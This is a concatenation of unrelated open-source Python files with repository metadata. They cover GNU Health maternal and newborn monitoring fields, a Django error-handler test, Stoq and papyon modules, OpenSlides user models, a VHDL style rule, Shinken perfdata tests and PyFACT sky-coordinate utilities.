# --------------------------------------------------------
# Rename the labels of these fields.
# --------------------------------------------------------
frequency = fields.Integer('CR')
f_frequency = fields.Integer('FHT')
# --------------------------------------------------------
# Add a new value.
# --------------------------------------------------------
fetus_position = fields.Selection([
('c', 'Cephalic'),
('o', 'Occiput / Cephalic Posterior'),
('fb', 'Frank Breech'),
('cb', 'Complete Breech'),
('t', 'Transverse Lie'),
('t', 'Footling Breech'),
], 'Fetus Position', sort=False)
# --------------------------------------------------------
# Hide these fields.
# --------------------------------------------------------
contractions = fields.Integer('Contractions', states={'invisible': True})
# --------------------------------------------------------
# Add these fields.
# --------------------------------------------------------
contractionsStr = fields.Char('Contractions', size=12)
# --------------------------------------------------------
# Default field values.
# --------------------------------------------------------
@staticmethod
def default_fetus_position():
return 'c'
class MmcPuerperiumMonitor(ModelSQL, ModelView):
'Puerperium Monitor'
__name__ = 'gnuhealth.puerperium.monitor'
# --------------------------------------------------------
# Change the labels of these fields.
# --------------------------------------------------------
temperature = fields.Float('Temp (C)', help='Temperature in celcius of the mother')
frequency = fields.Integer('CR')
# --------------------------------------------------------
# Add additional fields.
# --------------------------------------------------------
ebl = fields.Integer('EBL (ml)', help="Estimated blood loss (ml)")
examiner = fields.Char('Examiner', required=True)
# --------------------------------------------------------
# Add a convenience function that displays the blood pressure
# as one field instead of two. Useful for the tree view.
# --------------------------------------------------------
bp = fields.Function(fields.Char('B/P'), 'get_patient_evaluation_data')
# --------------------------------------------------------
# Add a display field for the tree view that only shows the
# admission date and not the time.
# --------------------------------------------------------
eval_date_only = fields.Function(fields.Date('Date'), 'get_patient_evaluation_data')
@staticmethod
def get_patient_evaluation_data(ids, name):
result = {}
for evaluation_data in ids:
if name == 'bp':
result[evaluation_data.id] = "{0}/{1}".format(evaluation_data.systolic, evaluation_data.diastolic)
if name == 'eval_date_only':
result[evaluation_data.id] = datetime.datetime.date(evaluation_data.date)
return result
class Address(ModelSQL, ModelView):
"Address"
__name__ = 'party.address'
# --------------------------------------------------------
# Change labels, adjust help, etc.
# --------------------------------------------------------
name = fields.Char('Addr Name', help="Example: Home, mother's house, prior home, etc.",
states={'readonly': ~Eval('active'),}, depends=['active'])
street = fields.Char('Address',
states={'readonly': ~Eval('active'),}, depends=['active'])
# --------------------------------------------------------
# Add new fields.
# --------------------------------------------------------
barangay = fields.Char('Barangay', help="The patient's barangay")
is_agdao = fields.Boolean('Is from Agdao?',
help="Check if the patient is from Agdao")
@staticmethod
def default_city():
# TODO: do this right.
return 'Davao City'
class MmcPostpartumContinuedMonitor(ModelSQL, ModelView):
'Postpartum Continued Monitor'
__name__ = 'gnuhealth.postpartum.continued.monitor'
name = fields.Many2One('gnuhealth.patient.pregnancy', 'Patient Pregnancy')
date_time = fields.DateTime('Date/Time', required=True)
initials = fields.Char('Initials', size=10, help="Who did the examination?")
# --------------------------------------------------------
# Mother's fields.
# --------------------------------------------------------
systolic = fields.Integer('Systolic Pressure', help="Mother's systolic")
diastolic = fields.Integer('Diastolic Pressure', help="Mother's diastolic")
mother_cr = fields.Integer("CR", help="Mother's heart rate")
mother_temp = fields.Float('Temp (C)', help='Temperature in celcius of the mother')
fundus_desc = fields.Char('Fundus Desc', size=30, help="Fundus description")
ebl = fields.Integer('EBL (ml)', help="Estimated blood loss (ml)")
# --------------------------------------------------------
# Baby's fields.
# --------------------------------------------------------
bfed = fields.Boolean('BFed', help="Breast Fed");
baby_temp = fields.Float('Baby Temp (C)', help='Temperature in celcius of the baby')
baby_rr = fields.Integer("Baby RR", help="Baby's respitory rate")
baby_cr = fields.Integer("Baby CR", help="Baby's heart rate")
comments = fields.Char('Comments', size=100, help="Comments")
# --------------------------------------------------------
# Add a convenience function that displays the blood pressure
# as one field instead of two. Useful for the tree view.
# --------------------------------------------------------
bp = fields.Function(fields.Char('B/P'), 'get_patient_evaluation_data')
@staticmethod
def get_patient_evaluation_data(ids, name):
result = {}
for evaluation_data in ids:
if name == 'bp':
if evaluation_data.systolic == None or evaluation_data.diastolic == None:
result[evaluation_data.id] = ''
else:
result[evaluation_data.id] = "{0}/{1}".format(evaluation_data.systolic, evaluation_data.diastolic)
return result
class MmcPostpartumOngoingMonitor(ModelSQL, ModelView):
'Postpartum Ongoing Monitor'
__name__ = 'gnuhealth.postpartum.ongoing.monitor'
name = fields.Many2One('gnuhealth.patient.pregnancy', 'Patient Pregnancy')
# --------------------------------------------------------
# Examination fields.
# --------------------------------------------------------
date_time = fields.DateTime('Date/Time', required=True)
initials = fields.Char('Initials', size=10, required=True,
help="Who did the examination?")
# --------------------------------------------------------
# Baby fields.
# --------------------------------------------------------
b_weight = fields.Integer('Weight', help="Weight in grams")
b_temp = fields.Float('Temp (C)', help='Temperature in celcius of the baby')
b_cr = fields.Integer("Baby CR", help="Baby's heart rate")
b_rr = fields.Integer("Baby RR", help="Baby's respitory rate")
b_lungs = fields.Char('Lungs', size=70)
b_skin = fields.Char('Color/Skin', size=70)
b_cord = fields.Char('Cord', size=70)
b_urine_last_24 = fields.Char('Urine last 24 hours', size=70)
b_stool_last_24 = fields.Char('Stool last 24 hours', size=70)
b_ss_infection = fields.Char('SS Infection', size=70)
b_feeding = fields.Char('Feeding', size=70)
b_nbs = fields.DateTime('NBS')
b_bcg = fields.Char('BCG', size=70)
b_other = fields.Char('Other', size=70)
# --------------------------------------------------------
# Mother fields.
# --------------------------------------------------------
m_temp = fields.Float('Temp (C)', help='Temperature in celcius of the mother')
m_systolic = fields.Integer('Systolic Pressure', help="Mother's systolic")
m_diastolic = fields.Integer('Diastolic Pressure', help="Mother's diastolic")
m_cr = fields.Integer("CR", help="Mother's heart rate")
m_breasts = fields.Char('Breasts', size=70)
m_fundus = fields.Char('Fundus', size=70)
m_perineum = fields.Char('Perineum', size=70)
m_lochia = fields.Char('Lochia', size=70)
m_urine = fields.Char('Urine', size=70)
m_stool = fields.Char('Stool', size=70)
m_ss_infection = fields.Char('SS Infection', size=70)
m_other = fields.Char('Other', size=70)
m_next_visit = fields.DateTime('Next Scheduled Visit')
|
kbsymanz/gnuhealth_mmc
|
mmc.py
|
Python
|
mit
| 35,273 | 0.003714 |
from django.conf.urls import url
from django.core.exceptions import PermissionDenied
from django.template.response import TemplateResponse
from django.test import SimpleTestCase, override_settings
def template_response_error_handler(request, exception=None):
return TemplateResponse(request, 'test_handler.html', status=403)
def permission_denied_view(request):
raise PermissionDenied
urlpatterns = [
url(r'^$', permission_denied_view),
]
handler403 = template_response_error_handler
@override_settings(ROOT_URLCONF='handlers.tests_custom_error_handlers')
class CustomErrorHandlerTests(SimpleTestCase):
def test_handler_renders_template_response(self):
"""
BaseHandler should render TemplateResponse if necessary.
"""
response = self.client.get('/')
self.assertContains(response, 'Error handler content', status_code=403)
|
jejimenez/django
|
tests/handlers/tests_custom_error_handlers.py
|
Python
|
bsd-3-clause
| 888 | 0 |
# -*- coding: utf-8 -*-
# vi:si:et:sw=4:sts=4:ts=4
##
## Copyright (C) 2005, 2006 Async Open Source
##
## This program is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public License
## as published by the Free Software Foundation; either version 2
## of the License, or (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., or visit: http://www.gnu.org/.
##
##
## Author(s): Stoq Team <stoq-devel@async.com.br>
##
""" Basic slave definitions """
from stoqlib.lib.translation import stoqlib_gettext
from stoqlib.gui.editors.baseeditor import BaseEditorSlave
_ = stoqlib_gettext
# FIXME: s/NoteSlave/NotesSlave/ and move this to stoqlib.gui.slaves.notesslave
class NoteSlave(BaseEditorSlave):
""" Slave store general notes. The model must have an attribute 'notes'
to work.
"""
gladefile = 'NoteSlave'
proxy_widgets = ('notes', )
def __init__(self, store, model, visual_mode=False):
self.model = model
self.model_type = self.model_type or type(model)
BaseEditorSlave.__init__(self, store, self.model,
visual_mode=visual_mode)
self.notes.set_accepts_tab(False)
def setup_proxies(self):
self.proxy = self.add_proxy(self.model,
NoteSlave.proxy_widgets)
|
andrebellafronte/stoq
|
stoqlib/gui/base/slaves.py
|
Python
|
gpl-2.0
| 1,749 | 0.007433 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Johann Prieur <johann.prieur@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
import xml.sax.saxutils as xml
def soap_header(from_member_name, friendly_name, proxy, msnp_ver, build_ver,
to_member_name, message_number, security_token, app_id,
lock_key):
"""Returns the SOAP xml header"""
# FIXME : escape the parameters
return """<From memberName="%(from_member_name)s" friendlyName="%(friendly_name)s" xml:lang="en-US" proxy="%(proxy)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/" msnpVer="%(msnp_ver)s" buildVer="%(build_ver)s"/>
<To memberName="%(to_member_name)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/"/>
<Ticket passport="%(passport)s" appid="%(app_id)s" lockkey="%(lock_key)s" xmlns="http://messenger.msn.com/ws/2004/09/oim/"/>
<Sequence xmlns="http://schemas.xmlsoap.org/ws/2003/03/rm">
<Identifier xmlns="http://schemas.xmlsoap.org/ws/2002/07/utility">
http://messenger.msn.com
</Identifier>
<MessageNumber>%(message_number)s</MessageNumber>
</Sequence>""" % { 'from_member_name' : from_member_name,
'friendly_name' : friendly_name,
'proxy' : proxy,
'msnp_ver' : msnp_ver,
'build_ver' : build_ver,
'to_member_name' : to_member_name,
'passport' : xml.escape(security_token),
'app_id' : app_id,
'lock_key' : lock_key,
'message_number' : message_number }
def transport_headers():
"""Returns a dictionary, containing transport (http) headers
to use for the request"""
return {}
def soap_action():
"""Returns the SOAPAction value to pass to the transport
or None if no SOAPAction needs to be specified"""
return "http://messenger.live.com/ws/2006/09/oim/Store2"
def soap_body(message_type, message_content):
"""Returns the SOAP xml body"""
return """<MessageType xmlns="http://messenger.msn.com/ws/2004/09/oim/">
%s
</MessageType>
<Content xmlns="http://messenger.msn.com/ws/2004/09/oim/">
%s
</Content>""" % (message_type, message_content)
def process_response(soap_response):
return True
|
emesene/papyon
|
papyon/service/description/OIM/Store2.py
|
Python
|
gpl-2.0
| 3,213 | 0.009648 |
import smtplib
from decimal import Decimal
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import (
AbstractBaseUser,
BaseUserManager,
Group as DjangoGroup,
GroupManager as _GroupManager,
Permission,
PermissionsMixin,
)
from django.core import mail
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db import models
from django.db.models import Prefetch
from django.utils import timezone
from jsonfield import JSONField
from openslides.utils.manager import BaseManager
from ..core.config import config
from ..utils.auth import GROUP_ADMIN_PK
from ..utils.autoupdate import inform_changed_data
from ..utils.models import (
CASCADE_AND_AUTOUPDATE,
SET_NULL_AND_AUTOUPDATE,
RESTModelMixin,
)
from .access_permissions import (
GroupAccessPermissions,
PersonalNoteAccessPermissions,
UserAccessPermissions,
)
class UserManager(BaseUserManager):
"""
Customized manager that creates new users only with a password and a
username. It also supports our get_prefetched_queryset method.
"""
def get_prefetched_queryset(self, ids=None):
"""
Returns the normal queryset with all users. In the background all
groups are prefetched from the database together with all permissions
and content types.
"""
queryset = self.get_queryset()
if ids:
queryset = queryset.filter(pk__in=ids)
return queryset.prefetch_related(
Prefetch(
"groups",
queryset=Group.objects.select_related("group_ptr").prefetch_related(
Prefetch(
"permissions",
queryset=Permission.objects.select_related("content_type"),
)
),
),
"vote_delegated_from_users",
)
def create_user(self, username, password, skip_autoupdate=False, **kwargs):
"""
Creates a new user only with a password and a username.
"""
user = self.model(username=username, **kwargs)
user.set_password(password)
user.save(skip_autoupdate=skip_autoupdate, using=self._db)
return user
def create_or_reset_admin_user(self, skip_autoupdate=False):
"""
Creates an user with the username 'admin'. If such a user already
exists, resets it. The password is (re)set to 'admin'. The user
becomes member of the group 'Admin'.
"""
created = False
try:
admin = self.get(username="admin")
except ObjectDoesNotExist:
admin = self.model(username="admin", last_name="Administrator")
created = True
admin.default_password = "admin"
admin.password = make_password(admin.default_password)
admin.save(skip_autoupdate=skip_autoupdate)
admin.groups.add(GROUP_ADMIN_PK)
if not skip_autoupdate:
inform_changed_data(admin)
return created
def generate_username(self, first_name, last_name):
"""
Generates a username from first name and last name.
"""
first_name = first_name.strip()
last_name = last_name.strip()
if first_name and last_name:
base_name = " ".join((first_name, last_name))
else:
base_name = first_name or last_name
if not base_name:
raise ValueError(
"Either 'first_name' or 'last_name' must not be empty."
)
if not self.filter(username=base_name).exists():
generated_username = base_name
else:
counter = 0
while True:
counter += 1
test_name = f"{base_name} {counter}"
if not self.filter(username=test_name).exists():
generated_username = test_name
break
return generated_username
class User(RESTModelMixin, PermissionsMixin, AbstractBaseUser):
"""
Model for users in OpenSlides. A client can login as an user with
credentials. An user can also just be used as representation for a person
in other OpenSlides apps like motion submitter or (assignment) election
candidates.
"""
access_permissions = UserAccessPermissions()
USERNAME_FIELD = "username"
username = models.CharField(max_length=255, unique=True, blank=True)
auth_type = models.CharField(max_length=64, default="default")
first_name = models.CharField(max_length=255, blank=True)
last_name = models.CharField(max_length=255, blank=True)
gender = models.CharField(max_length=255, blank=True)
email = models.EmailField(blank=True)
last_email_send = models.DateTimeField(blank=True, null=True)
# TODO: Try to remove the default argument in the following fields.
structure_level = models.CharField(max_length=255, blank=True, default="")
title = models.CharField(max_length=50, blank=True, default="")
number = models.CharField(max_length=50, blank=True, default="")
about_me = models.TextField(blank=True, default="")
comment = models.TextField(blank=True, default="")
default_password = models.CharField(max_length=100, blank=True, default="")
is_active = models.BooleanField(default=True)
is_present = models.BooleanField(default=False)
is_committee = models.BooleanField(default=False)
vote_weight = models.DecimalField(
default=Decimal("1"), max_digits=15, decimal_places=6, null=False, blank=True
)
vote_delegated_to = models.ForeignKey(
"self",
on_delete=SET_NULL_AND_AUTOUPDATE,
null=True,
blank=True,
related_name="vote_delegated_from_users",
)
objects = UserManager()
class Meta:
default_permissions = ()
permissions = (
("can_see_name", "Can see names of users"),
(
"can_see_extra_data",
"Can see extra data of users (e.g. email and comment)",
),
("can_change_password", "Can change its own password"),
("can_manage", "Can manage users"),
)
ordering = ("last_name", "first_name", "username")
def __str__(self):
# Strip white spaces from the name parts
first_name = self.first_name.strip()
last_name = self.last_name.strip()
# The user has a last_name and a first_name
if first_name and last_name:
name = " ".join((self.first_name, self.last_name))
# The user has only a first_name or a last_name or no name
else:
name = first_name or last_name or self.username
# Return result
return name
def save(self, *args, **kwargs):
"""
Overridden method to skip autoupdate if only last_login field was
updated as it is done during login.
"""
if kwargs.get("update_fields") == ["last_login"]:
kwargs["skip_autoupdate"] = True
return super().save(*args, **kwargs)
def has_perm(self, perm):
"""
This method is closed. Do not use it but use openslides.utils.auth.has_perm.
"""
raise RuntimeError(
"Do not use user.has_perm() but use openslides.utils.auth.has_perm"
)
def send_invitation_email(
self, connection, subject, message, skip_autoupdate=False
):
"""
Sends an invitation email to the users. Returns True on success, False on failiure.
May raise an ValidationError, if something went wrong.
"""
if not self.email:
return False
# Custom dict class that for formatstrings with entries like {not_existent}
# no error is raised and this is replaced with ''.
class format_dict(dict):
def __missing__(self, key):
return ""
message_format = format_dict(
{
"name": str(self),
"event_name": config["general_event_name"],
"url": config["users_pdf_url"],
"username": self.username,
"password": self.default_password,
}
)
try:
message = message.format(**message_format)
except KeyError as err:
raise ValidationError({"detail": "Invalid property {0}", "args": [err]})
subject_format = format_dict(
{"event_name": config["general_event_name"], "username": self.username}
)
try:
subject = subject.format(**subject_format)
except KeyError as err:
raise ValidationError({"detail": "Invalid property {0}", "args": [err]})
# Create an email and send it.
email = mail.EmailMessage(
subject,
message,
config["users_email_sender"] + " <" + settings.DEFAULT_FROM_EMAIL + ">",
[self.email],
reply_to=[config["users_email_replyto"]],
)
try:
count = connection.send_messages([email])
except smtplib.SMTPDataError as e:
error = e.smtp_code
helptext = ""
if error == 554: # The server does not accept our connection. The code is
# something like "transaction failed" or "No SMTP service here"
helptext = " Is the email sender correct?"
connection.close()
raise ValidationError(
{
"detail": "Error {0}. Cannot send email.{1}",
"args": [error, helptext],
}
)
except smtplib.SMTPRecipientsRefused:
pass # Run into returning false later
except smtplib.SMTPAuthenticationError as e:
# Nice error message on auth failure
raise ValidationError(
{
"detail": "Error {0}: Authentication failure. Please contact your local administrator.",
"args": [e.smtp_code],
}
)
else:
if count == 1:
self.email_send = True
self.last_email_send = timezone.now()
self.save(skip_autoupdate=skip_autoupdate)
return True
return False
@property
def session_auth_hash(self):
"""
Returns the session auth hash of a user as attribute.
Needed for the django rest framework.
"""
return self.get_session_auth_hash()
class GroupManager(_GroupManager):
"""
Customized manager that supports our get_prefetched_queryset method.
"""
def get_prefetched_queryset(self, ids=None):
"""
Returns the normal queryset with all groups. In the background all
permissions with the content types are prefetched from the database.
"""
queryset = self.get_queryset()
if ids:
queryset = queryset.filter(pk__in=ids)
return queryset.select_related("group_ptr").prefetch_related(
Prefetch(
"permissions",
queryset=Permission.objects.select_related("content_type"),
)
)
class Group(RESTModelMixin, DjangoGroup):
"""
Extend the django group with support of our REST and caching system.
"""
access_permissions = GroupAccessPermissions()
objects = GroupManager()
class Meta:
default_permissions = ()
class PersonalNoteManager(BaseManager):
"""
Customized model manager to support our get_prefetched_queryset method.
"""
def get_prefetched_queryset(self, *args, **kwargs):
"""
Returns the normal queryset with all personal notes. In the background all
users are prefetched from the database.
"""
return super().get_prefetched_queryset(*args, **kwargs).select_related("user")
class PersonalNote(RESTModelMixin, models.Model):
"""
Model for personal notes (e. g. likes/stars) of a user concerning different
openslides objects like motions.
"""
access_permissions = PersonalNoteAccessPermissions()
personalized_model = True
"""
Each model belongs to one user. This relation is set during creation and
will not be changed.
"""
objects = PersonalNoteManager()
user = models.OneToOneField(User, on_delete=CASCADE_AND_AUTOUPDATE)
notes = JSONField()
class Meta:
default_permissions = ()
|
jwinzer/OpenSlides
|
server/openslides/users/models.py
|
Python
|
mit
| 12,597 | 0.001111 |
from vsg.rules import token_prefix
from vsg import token
lTokens = []
lTokens.append(token.signal_declaration.identifier)
class rule_008(token_prefix):
'''
This rule checks for valid prefixes on signal identifiers.
Default signal prefix is *s\_*.
|configuring_prefix_and_suffix_rules_link|
**Violation**
.. code-block:: vhdl
signal wr_en : std_logic;
signal rd_en : std_logic;
**Fix**
.. code-block:: vhdl
signal s_wr_en : std_logic;
signal s_rd_en : std_logic;
'''
def __init__(self):
token_prefix.__init__(self, 'signal', '008', lTokens)
self.prefixes = ['s_']
self.solution = 'Signal identifiers'
|
jeremiah-c-leary/vhdl-style-guide
|
vsg/rules/signal/rule_008.py
|
Python
|
gpl-3.0
| 705 | 0.001418 |
#!/usr/bin/env python
# Copyright (C) 2009-2010:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
#
# This file is used to test reading and processing of config files
#
from shinken_test import *
from shinken.misc.perfdata import Metric, PerfDatas
class TestParsePerfdata(ShinkenTest):
# Uncomment this is you want to use a specific configuration
# for your test
#def setUp(self):
# self.setup_with_file('etc/nagios_parse_perfdata.cfg')
def test_parsing_perfdata(self):
s = 'ramused=1009MB;;;0;1982 swapused=540MB;;;0;3827 memused=1550MB;2973;3964;0;5810'
s = 'ramused=1009MB;;;0;1982'
m = Metric(s)
self.assert_(m.name == 'ramused')
self.assert_(m.value == 1009)
self.assert_(m.uom == 'MB')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == 0)
self.assert_(m.max == 1982)
s = 'ramused=90%;85;95;;'
m = Metric(s)
self.assert_(m.name == 'ramused')
self.assert_(m.value == 90)
self.assert_(m.uom == '%')
self.assert_(m.warning == 85)
self.assert_(m.critical == 95)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
s = 'ramused=1009MB;;;0;1982 swapused=540MB;;;; memused=90%'
p = PerfDatas(s)
p.metrics
m = p['swapused']
self.assert_(m.name == 'swapused')
self.assert_(m.value == 540)
self.assert_(m.uom == 'MB')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == None)
self.assert_(m.max == None)
m = p['memused']
self.assert_(m.name == 'memused')
self.assert_(m.value == 90)
self.assert_(m.uom == '%')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
self.assert_(len(p) == 3)
s = "'Physical Memory Used'=12085620736Bytes; 'Physical Memory Utilisation'=94%;80;90;"
p = PerfDatas(s)
p.metrics
m = p['Physical Memory Used']
self.assert_(m.name == 'Physical Memory Used')
self.assert_(m.value == 12085620736)
self.assert_(m.uom == 'Bytes')
self.assert_(m.warning is None)
self.assert_(m.critical is None)
self.assert_(m.min is None)
self.assert_(m.max is None)
m = p['Physical Memory Utilisation']
self.assert_(m.name == 'Physical Memory Utilisation')
self.assert_(m.value == 94)
self.assert_(m.uom == '%')
self.assert_(m.warning == 80)
self.assert_(m.critical == 90)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
s = "'C: Space'=35.07GB; 'C: Utilisation'=87.7%;90;95;"
p = PerfDatas(s)
p.metrics
m = p['C: Space']
self.assert_(m.name == 'C: Space')
self.assert_(m.value == 35.07)
self.assert_(m.uom == 'GB')
self.assert_(m.warning is None)
self.assert_(m.critical is None)
self.assert_(m.min is None)
self.assert_(m.max is None)
m = p['C: Utilisation']
self.assert_(m.name == 'C: Utilisation')
self.assert_(m.value == 87.7)
self.assert_(m.uom == '%')
self.assert_(m.warning == 90)
self.assert_(m.critical == 95)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
if __name__ == '__main__':
unittest.main()
|
xorpaul/shinken
|
test/test_parse_perfdata.py
|
Python
|
agpl-3.0
| 4,222 | 0.002842 |
#===========================================================================
# Copyright (c) 2011-2012, the PyFACT developers
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the PyFACT developers nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE PYFACT DEVELOPERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===========================================================================
# Imports
import sys, time, logging, os, datetime, math
import numpy as np
import scipy.optimize
import scipy.special
import scipy.ndimage
import pyfits
import pyfact as pf
#===========================================================================
# Functions & classes
#---------------------------------------------------------------------------
class SkyCoord:
"""Sky coordinate in RA and Dec. All units should be degree."""
def __init__(self, ra, dec) :
"""
Sky coordinate in RA and Dec. All units should be degree.
In the current implementation it should also work with arrays, though one has to be careful in dist.
Parameters
----------
ra : float/array
Right ascension of the coordinate.
dec : float/array
Declination of the coordinate.
"""
self.ra, self.dec = ra, dec
def dist(self, c) :
"""
Return the distance of the coordinates in degree following the haversine formula,
see e.g. http://en.wikipedia.org/wiki/Great-circle_distance.
Parameters
----------
c : SkyCoord
Returns
-------
distance : float
Return the distance of the coordinates in degree following the haversine formula.
Notes
-----
http://en.wikipedia.org/wiki/Great-circle_distance
"""
return 2. * np.arcsin(np.sqrt(np.sin((self.dec - c.dec) / 360. * np.pi) ** 2.
+ np.cos(self.dec / 180. * np.pi) * np.cos(c.dec / 180. * np.pi)\
* np.sin((self.ra - c.ra) / 360. * np.pi) ** 2.)) / np.pi * 180.
#---------------------------------------------------------------------------
class SkyCircle:
"""A circle on the sky."""
def __init__(self, c, r) :
"""
A circle on the sky.
Parameters
----------
coord : SkyCoord
Coordinates of the circle center (RA, Dec)
r : float
Radius of the circle (deg).
"""
self.c, self.r = c, r
def contains(self, c) :
"""
Checks if the coordinate lies inside the circle.
Parameters
----------
c : SkyCoord
Returns
-------
contains : bool
True if c lies in the SkyCircle.
"""
return self.c.dist(c) <= self.r
def intersects(self, sc) :
"""
Checks if two sky circles overlap.
Parameters
----------
sc : SkyCircle
"""
return self.c.dist(sc.c) <= self.r + sc.r
#---------------------------------------------------------------------------
def skycircle_from_str(cstr) :
"""Creates SkyCircle from circle region string."""
x, y, r = eval(cstr.upper().replace('CIRCLE', ''))
return SkyCircle(SkyCoord(x, y), r)
#---------------------------------------------------------------------------
def get_cam_acc(camdist, rmax=4., nbins=None, exreg=None, fit=False, fitfunc=None, p0=None) :
"""
Calculates the camera acceptance histogram from a given list with camera distances (event list).
Parameters
----------
camdist : array
Numpy array of camera distances (event list).
rmax : float, optional
Maximum radius for the acceptance histogram.
nbins : int, optional
Number of bins for the acceptance histogram (default = 0.1 deg).
exreg : array, optional
Array of exclusion regions. Exclusion regions are given by an aray of size 2
[r, d] with r = radius, d = distance to camera center
fit : bool, optional
Fit acceptance histogram (default=False).
"""
if not nbins :
nbins = int(rmax / .1)
# Create camera distance histogram
n, bins = np.histogram(camdist, bins=nbins, range=[0., rmax])
nerr = np.sqrt(n)
# Bin center array
r = (bins[1:] + bins[:-1]) / 2.
# Bin area (ring) array
r_a = (bins[1:] ** 2. - bins[:-1] ** 2.) * np.pi
# Deal with exclusion regions
ex_a = None
if exreg :
ex_a = np.zeros(len(r))
t = np.ones(len(r))
for reg in exreg :
ex_a += (pf.circle_circle_intersection_a(bins[1:], t * reg[0], t * reg[1])
- pf.circle_circle_intersection_a(bins[:-1], t * reg[0], t * reg[1]))
ex_a /= r_a
# Fit the data
fitter = None
if fit :
#fitfunc = lambda p, x: p[0] * x ** p[1] * (1. + (x / p[2]) ** p[3]) ** ((p[1] + p[4]) / p[3])
if not fitfunc :
fitfunc = lambda p, x: p[0] * x ** 0. * (1. + (x / p[1]) ** p[2]) ** ((0. + p[3]) / p[2])
#fitfunc = lambda p, x: p[0] * x ** 0. * (1. + (x / p[1]) ** p[2]) ** ((0. + p[3]) / p[2]) + p[4] / (np.exp(p[5] * (x - p[6])) + 1.)
if not p0 :
p0 = [n[0] / r_a[0], 1.5, 3., -5.] # Initial guess for the parameters
#p0 = [.5 * n[0] / r_a[0], 1.5, 3., -5., .5 * n[0] / r_a[0], 100., .5] # Initial guess for the parameters
fitter = pf.ChisquareFitter(fitfunc)
m = (n > 0.) * (nerr > 0.) * (r_a != 0.) * ((1. - ex_a) != 0.)
if np.sum(m) <= len(p0) :
logging.error('Could not fit camera acceptance (dof={0}, bins={1})'.format(len(p0), np.sum(m)))
else :
# ok, this _should_ be improved !!!
x, y, yerr = r[m], n[m] / r_a[m] / (1. - ex_a[m]) , nerr[m] / r_a[m] / (1. - ex_a[m])
m = np.isfinite(x) * np.isfinite(y) * np.isfinite(yerr) * (yerr != 0.)
if np.sum(m) <= len(p0) :
logging.error('Could not fit camera acceptance (dof={0}, bins={1})'.format(len(p0), np.sum(m)))
else :
fitter.fit_data(p0, x[m], y[m], yerr[m])
return (n, bins, nerr, r, r_a, ex_a, fitter)
#---------------------------------------------------------------------------
def get_sky_mask_circle(r, bin_size) :
"""
Returns a 2d numpy histogram with (2. * r / bin_size) bins per axis
where a circle of radius has bins filled 1.s, all other bins are 0.
Parameters
----------
r : float
Radius of the circle.
bin_size : float
Physical size of the bin, same units as rmin, rmax.
Returns
-------
sky_mask : 2d numpy array
Returns a 2d numpy histogram with (2. * r / bin_size) bins per axis
where a circle of radius has bins filled 1.s, all other bins are 0.
"""
nbins = int(np.ceil(2. * r / bin_size))
sky_x = np.ones((nbins, nbins)) * np.linspace(bin_size / 2., 2. * r - bin_size / 2., nbins)
sky_y = np.transpose(sky_x)
sky_mask = np.where(np.sqrt((sky_x - r) ** 2. + (sky_y - r) ** 2.) < r, 1., 0.)
return sky_mask
#---------------------------------------------------------------------------
def get_sky_mask_ring(rmin, rmax, bin_size) :
"""
